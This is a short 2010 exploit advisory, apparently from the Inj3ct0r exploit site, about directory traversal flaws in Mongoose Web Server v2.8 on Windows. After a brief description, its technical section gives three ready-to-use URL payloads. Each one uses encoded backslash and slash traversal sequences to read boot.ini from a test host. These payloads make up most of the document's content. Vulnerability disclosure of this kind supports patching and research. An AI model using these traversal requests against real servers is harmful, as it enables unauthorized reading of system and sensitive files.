Mongoose Web Server v2.8 Multiple Directory Traversal Exploi
Posted on 20 April 2010
============================================================== Mongoose Web Server v2.8 Multiple Directory Traversal Exploits ============================================================== ################################################################ # # Mongoose Web Server v2.8 Multiple Directory Traversal Exploits # Found By: Dr_IDE # Date: Apr. 20, 2010 # Tested On: Windows 7 # Download: http://code.google.com/p/mongoose/downloads/list # ################################################################ - Description - Mongoose v2.8 is a Windows based HTTP server. This is the latest version of the application available. Mongoose v2.8 is vulnerable to many remote directory traversal attacks. - Technical Details - http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini http://172.16.2.102/..%5C..%5Cboot.ini # Inj3ct0r.com [2010-04-20]
